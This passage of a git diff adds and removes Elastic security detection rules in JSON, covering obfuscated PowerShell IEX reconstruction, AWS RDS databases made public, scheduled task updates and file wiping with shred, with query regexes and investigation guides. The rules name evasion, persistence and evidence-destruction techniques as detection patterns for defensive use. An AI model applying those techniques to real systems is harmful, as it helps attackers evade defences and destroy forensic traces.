replace(\n powershell.file.script_block_text,\n \"\"\"\\$\\w+\\[\\-\\s?1\\.\\.\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n\n// FP Patterns\n| where not powershell.file.script_block_text like \"*GENESIS-5654*\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9edd1804-83c7-4e48-b97d-c776b4c97564", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 5 + }, + "id": "9edd1804-83c7-4e48-b97d-c776b4c97564_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9efb3f79-b77b-466a-9fa0-3645d22d1e7f_6.json b/packages/security_detection_engine/kibana/security_rule/9efb3f79-b77b-466a-9fa0-3645d22d1e7f_6.json new file mode 100644 index 00000000000..77652977bd8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9efb3f79-b77b-466a-9fa0-3645d22d1e7f_6.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of an Amazon RDS DB instance or cluster where the \"publiclyAccessible\" attribute is set to \"true\". Publicly accessible RDS instances expose a network endpoint on the public internet, which may allow unauthorized access if combined with overly permissive security groups, weak authentication, or misconfigured IAM policies. Adversaries may enable public access on an existing instance, or create a new publicly accessible instance, to establish persistence, move data outside of controlled network boundaries, or bypass internal access controls.", + "false_positives": [ + "Public access is a common configuration used to enable access from outside a private VPC. Ensure that the instance should not be modified in this way before taking action." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "target.entity.id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS RDS DB Instance Made Public", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS RDS DB Instance Made Public\n\nThis rule detects when an Amazon RDS DB instance or cluster is created or modified with\n`publiclyAccessible=true`. While some environments operate publicly accessible RDS instances,\nunexpected exposure of a database to the internet is a meaningful security risk. Adversaries who\ngain access to AWS credentials may modify a DB instance\u2019s public accessibility to exfiltrate data,\nestablish persistence, or bypass internal network restrictions. \n\n#### Possible Investigation Steps\n\n- **Identify the actor**\n - Review `aws.cloudtrail.user_identity.arn`, `aws.cloudtrail.user_identity.type`, and `access_key_id` to determine which IAM principal made the change.\n - Determine whether the user, role, or automation service typically manages RDS configurations.\n\n- **Examine the request parameters**\n - Review `aws.cloudtrail.request_parameters` for:\n - `publiclyAccessible=true`\n - DBInstanceIdentifier / DBClusterIdentifier\n - Additional changes included in the same modification request (e.g., master user changes, security group updates)\n\n- **Validate the target resource**\n - Determine the sensitivity of the instance (`target.entity.id`):\n - What data does it store?\n - Is it production, staging, dev, or ephemeral?\n - Confirm whether the instance was previously private.\n\n- **Assess network exposure**\n - Check associated security groups for:\n - `0.0.0.0/0` (unrestricted ingress)\n - Unexpected IP ranges \n - Review VPC/subnet placement to determine if the instance is reachable externally.\n\n- **Correlate with other recent CloudTrail activity**\n - Look for related events performed by the same actor:\n - `AuthorizeSecurityGroupIngress`\n - `ModifyDBInstance`\n - IAM policy modifications enabling broader DB access\n - Look for indicators of credential misuse:\n - unusual `source.ip`\n - unusual `user_agent.original`\n - MFA not used (`session_context.mfa_authenticated=false`)\n\n- **Validate intent with owners**\n - Contact the service or database owner to confirm whether the change was an approved part of a deployment or migration.\n\n### False Positive Analysis\n\n- **Expected public-access configuration**\n - Some workloads intentionally require public access (e.g., internet-facing reporting tools).\n - Validate against change management tickets, deployment pipelines, or Terraform/IaC automation logs.\n\n### Response and Remediation\n\n- **Containment**\n - If exposure is unauthorized:\n - Modify the instance to disable public access (`publiclyAccessible=false`).\n - Restrict the security group inbound rules immediately.\n - Snapshot the instance to preserve state if compromise is suspected.\n\n- **Investigation**\n - Review all recent actions from the same IAM principal.\n - Check for data access patterns (CloudWatch, RDS Enhanced Monitoring, VPC Flow Logs).\n - Identify whether this exposure correlates with suspicious outbound network activity.\n\n- **Hardening**\n - Require private-only RDS instances unless explicitly documented.\n - Enforce security group least privilege and block public DB access via:\n - AWS Config rules (`rds-instance-public-access-check`)\n - Service Control Policies (SCPs) preventing public RDS settings\n - Implement continuous monitoring for network or configuration drift.\n\n- **Recovery**\n - Restore the database to a private subnet if necessary.\n - Rotate credentials used by the DB instance and associated applications.\n - Document the incident and update policies or IaC templates to prevent recurrence.\n\n### Additional Information:\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "any where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"rds.amazonaws.com\"\n and event.outcome == \"success\"\n and (\n (event.action == \"ModifyDBInstance\" and stringContains(aws.cloudtrail.request_parameters, \"publiclyAccessible=true\"))\n or\n (event.action in (\"CreateDBInstance\", \"CreateDBCluster\") and stringContains(aws.cloudtrail.request_parameters, \"publiclyAccessible=true\"))\n )\n", + "references": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBInstance.html", + "https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.DBInstance.Modifying.html", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence#make-instance-publicly-accessible-rds-modifydbinstance", + "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-createdbinstance" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9efb3f79-b77b-466a-9fa0-3645d22d1e7f", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/", + "subtechnique": [ + { + "id": "T1556.009", + "name": "Conditional Access Policies", + "reference": "https://attack.mitre.org/techniques/T1556/009/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "9efb3f79-b77b-466a-9fa0-3645d22d1e7f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_7.json b/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_7.json new file mode 100644 index 00000000000..eb574b18ffb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9f432a8b-9588-4550-838e-1f77285580d3_7.json @@ -0,0 +1,178 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that reconstruct the IEX (Invoke-Expression) command by accessing and indexing the string representation of method references. This obfuscation technique uses constructs like ''.IndexOf.ToString() to expose method metadata as a string, then extracts specific characters through indexed access and joins them to form IEX, bypassing static keyword detection and evading defenses such as AMSI.", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Dynamic IEX Reconstruction via Method String Access", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Dynamic IEX Reconstruction via Method String Access\n\nPowerShell's flexibility allows dynamic command execution, which adversaries exploit by obfuscating commands like Invoke-Expression (IEX). They manipulate method strings to reconstruct IEX, evading static detection. The detection rule identifies scripts using this obfuscation by analyzing patterns in method string access, flagging suspicious activity for further investigation.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script that triggered the alert. Look for any suspicious patterns or obfuscation techniques.\n- Examine the file.path field to determine the location of the script on the host system, which can provide context about its origin and potential legitimacy.\n- Check the host.name and user.id fields to identify the machine and user account involved in executing the script, which can help assess whether the activity aligns with expected behavior.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other PowerShell activities on the host, providing a broader view of the script's execution context.\n- Investigate the agent.id field to verify the endpoint's security posture and ensure that it is up-to-date with the latest security patches and configurations.\n\n### False positive analysis\n\n- Scripts with legitimate use of string manipulation methods like IndexOf or SubString may trigger false positives if they are part of complex PowerShell scripts used in administrative tasks. To manage this, review the context of the script and consider adding exceptions for known safe scripts or users.\n- Automated scripts from trusted software that perform extensive string operations for configuration or data processing might be flagged. Identify these scripts and exclude them by their script block ID or file path to prevent unnecessary alerts.\n- Development environments where PowerShell is used for testing or debugging purposes may generate alerts due to frequent use of string manipulation. Implement exclusions based on host names or user IDs associated with these environments to reduce noise.\n- Security tools or monitoring solutions that use PowerShell for log analysis or system checks might inadvertently match the detection pattern. Verify the source of the script and whitelist these tools by agent ID or specific script characteristics.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and does not inadvertently allow malicious activity.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Review the PowerShell script block text and script block ID from the alert to understand the scope and intent of the obfuscation technique used.\n- Remove any unauthorized or malicious scripts from the affected system to prevent re-execution.\n- Conduct a thorough scan of the isolated host using updated antivirus and anti-malware tools to identify and remove any additional threats.\n- Restore the affected system from a known good backup if the integrity of the system is compromised and cannot be assured.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"(?i)['\"]['\"].(Insert|Normalize|Chars|substring|Remove|LastIndexOfAny|LastIndexOf|IsNormalized|IndexOfAny|IndexOf)[^\\[]+\\[\\d+,\\d+,\\d+\\]\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n\n| where not (\n file.directory like \"C:\\\\\\\\Program Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\Maester\\\\\\\\1.1.0*\" or\n file.directory like \"C:\\\\\\\\Users\\\\\\\\*\\\\\\\\Documents\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\Maester\\\\\\\\1.1.0*\"\n )\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9f432a8b-9588-4550-838e-1f77285580d3", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 7 + }, + "id": "9f432a8b-9588-4550-838e-1f77285580d3_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_113.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_113.json deleted file mode 100644 index 19f93c361fc..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_113.json +++ /dev/null @@ -1,97 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Indicates the update of a scheduled task using Windows event logs. Adversaries can use these to establish persistence, by changing the configuration of a legit scheduled task. Some changes such as disabling or enabling a scheduled task are common and may may generate noise.", - "false_positives": [ - "Legitimate scheduled tasks may be created during installation of new software." - ], - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "A scheduled task was updated", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating A scheduled task was updated\n\nScheduled tasks in Windows automate routine tasks, enhancing efficiency. However, adversaries exploit this by modifying tasks to maintain persistence, often altering legitimate tasks to evade detection. The detection rule identifies suspicious updates by filtering out benign changes, such as those by system accounts or known safe tasks, focusing on anomalies that suggest malicious intent.\n\n### Possible investigation steps\n\n- Review the event logs to identify the specific scheduled task that was updated, focusing on the winlog.event_data.TaskName field to determine if it matches any known malicious patterns.\n- Investigate the user account associated with the update by examining the user.name field to ensure it is not a compromised account or an unauthorized user.\n- Check the winlog.event_data.SubjectUserSid field to verify if the update was made by a system account or a potentially malicious user, as system accounts like S-1-5-18, S-1-5-19, and S-1-5-20 are typically benign.\n- Analyze the history of changes to the scheduled task to identify any unusual or unauthorized modifications that could indicate persistence mechanisms.\n- Correlate the scheduled task update with other security events or alerts to determine if it is part of a broader attack pattern or campaign.\n\n### False positive analysis\n\n- Scheduled tasks updated by system accounts can be false positives. Exclude updates made by system accounts by filtering out user names ending with a dollar sign.\n- Legitimate Microsoft tasks often update automatically. Exclude tasks with names containing \"Microsoft\" to reduce noise from these updates.\n- Commonly updated tasks like User Feed Synchronization and OneDrive Reporting are typically benign. Exclude these specific task names to avoid unnecessary alerts.\n- Tasks updated by well-known service SIDs such as S-1-5-18, S-1-5-19, and S-1-5-20 are generally safe. Exclude these SIDs to prevent false positives from routine system operations.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity and lateral movement.\n- Review the specific scheduled task that was updated to determine if it was altered by an unauthorized user or process. Revert any unauthorized changes to their original state.\n- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any malicious software that may have been introduced.\n- Analyze the user account that made the changes to the scheduled task. If the account is compromised, reset the password and review recent activities for further signs of compromise.\n- Implement additional monitoring on the affected system and similar systems to detect any further unauthorized scheduled task updates or related suspicious activities.\n- Escalate the incident to the security operations team for further investigation and to determine if the threat is part of a larger attack campaign.\n- Review and update access controls and permissions related to scheduled tasks to ensure only authorized personnel can make changes, reducing the risk of future unauthorized modifications.", - "query": "iam where event.action == \"scheduled-task-updated\" and\n\n /* excluding tasks created by the computer account */\n not user.name : \"*$\" and\n not winlog.event_data.TaskName : \"*Microsoft*\" and\n not winlog.event_data.TaskName :\n (\"\\\\User_Feed_Synchronization-*\",\n \"\\\\OneDrive Reporting Task-S-1-5-21*\",\n \"\\\\OneDrive Reporting Task-S-1-12-1-*\",\n \"\\\\Hewlett-Packard\\\\HP Web Products Detection\",\n \"\\\\Hewlett-Packard\\\\HPDeviceCheck\",\n \"\\\\Microsoft\\\\Windows\\\\UpdateOrchestrator\\\\UpdateAssistant\",\n \"\\\\IpamDnsProvisioning\",\n \"\\\\Microsoft\\\\Windows\\\\UpdateOrchestrator\\\\UpdateAssistantAllUsersRun\",\n \"\\\\Microsoft\\\\Windows\\\\UpdateOrchestrator\\\\UpdateAssistantCalendarRun\",\n \"\\\\Microsoft\\\\Windows\\\\UpdateOrchestrator\\\\UpdateAssistantWakeupRun\",\n \"\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN v*\",\n \"\\\\Microsoft\\\\VisualStudio\\\\Updates\\\\BackgroundDownload\") and\n not winlog.event_data.SubjectUserSid : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.64.0" - }, - { - "package": "windows", - "version": "^2.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectUserSid", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.TaskName", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "a02cb68e-7c93-48d1-93b2-2c39023308eb", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.005", - "name": "Scheduled Task", - "reference": "https://attack.mitre.org/techniques/T1053/005/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 113 - }, - "id": "a02cb68e-7c93-48d1-93b2-2c39023308eb_113", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_214.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_214.json new file mode 100644 index 00000000000..1868185766e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_214.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process*", + "logs-sentinel_one_cloud_funnel.*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Deletion via Shred", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating File Deletion via Shred\n\nThe `shred` command in Linux is used to securely delete files by overwriting them, making recovery difficult. Adversaries exploit this to erase traces of malicious activity, hindering forensic analysis. The detection rule identifies suspicious use of `shred` by monitoring its execution with specific arguments, excluding benign processes like `logrotate`, to flag potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the process execution details to confirm the use of the `shred` command with suspicious arguments such as \"-u\", \"--remove\", \"-z\", or \"--zero\".\n- Identify the user account associated with the `shred` process to determine if the activity aligns with expected behavior for that user.\n- Investigate the parent process of `shred` to ensure it is not `logrotate` and assess whether the parent process is legitimate or potentially malicious.\n- Examine the timeline of events leading up to and following the `shred` execution to identify any related suspicious activities or file modifications.\n- Check for any other alerts or logs related to the same host or user to identify patterns or additional indicators of compromise.\n- Assess the impact of the file deletion by determining which files were targeted and whether they are critical to system operations or security.\n\n### False positive analysis\n\n- Logrotate processes may trigger false positives as they use shred for legitimate log file management. Exclude logrotate as a parent process in detection rules to prevent these alerts.\n- System maintenance scripts that securely delete temporary files using shred can cause false positives. Identify and whitelist these scripts to reduce unnecessary alerts.\n- Backup or cleanup operations that involve shredding old data might be flagged. Review and exclude these operations if they are part of routine system management.\n- User-initiated file deletions for privacy or space management can appear suspicious. Educate users on the implications of using shred and consider excluding known user actions if they are frequent and benign.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity or data exfiltration.\n- Terminate any active `shred` processes that are not associated with legitimate applications like `logrotate` to halt ongoing file deletion.\n- Conduct a thorough review of recent system logs and file access records to identify any additional malicious activities or files that may have been created or modified by the adversary.\n- Restore any critical files that were deleted using `shred` from the most recent backup, ensuring the integrity and security of the backup source.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement enhanced monitoring on the affected system and similar environments to detect any future unauthorized use of `shred` or similar file deletion tools.\n- Review and update endpoint security configurations to prevent unauthorized execution of file deletion commands by non-administrative users.", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\nprocess.name == \"shred\" and (\n// Any short-flag cluster containing at least one of u/z, and containing no extra \"-\" after the first one\nprocess.args regex~ \"-[^-]*[uz][^-]*\" or\nprocess.args in (\"--remove\", \"--zero\")\n) and\nnot process.parent.name == \"logrotate\"\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.18.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "a1329140-8de3-4445-9f87-908fb6d824f4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 